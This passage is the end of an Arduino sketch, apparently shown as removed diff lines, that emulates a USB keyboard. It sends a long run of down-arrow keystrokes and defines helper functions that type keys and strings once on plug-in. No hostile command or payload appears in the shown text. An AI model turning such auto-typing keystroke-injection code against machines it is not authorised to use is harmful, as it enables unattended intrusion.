- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- for(int i = 0; i < 70; i++) {
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- }
- Keyboard.end();
- }
- // Holds down `key` on the emulated USB keyboard. The key is let go again here only when
- // `release` is true; every call in this sketch passes false and relies on a later
- // Keyboard.releaseAll() instead, which is how the modifier+key chords are formed.
- void type(int key, boolean release) {
-   Keyboard.press(key);
-   if (!release) {
-     return;
-   }
-   Keyboard.release(key);
- }
- // Sends a flash-resident string (built with the F() macro at the call sites) to the host
- // as keystrokes by handing it straight to Keyboard.print().
- void print(const __FlashStringHelper *value)
- {
-   Keyboard.print(value);
- }
- // Left empty on purpose: the whole keystroke sequence is sent once from setup(), so
- // nothing is typed again until the board is re-plugged or reset.
- void loop() {
- }